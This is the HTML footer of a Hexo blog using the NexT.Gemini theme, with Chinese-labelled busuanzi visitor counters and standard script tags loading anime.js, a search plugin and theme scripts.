    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
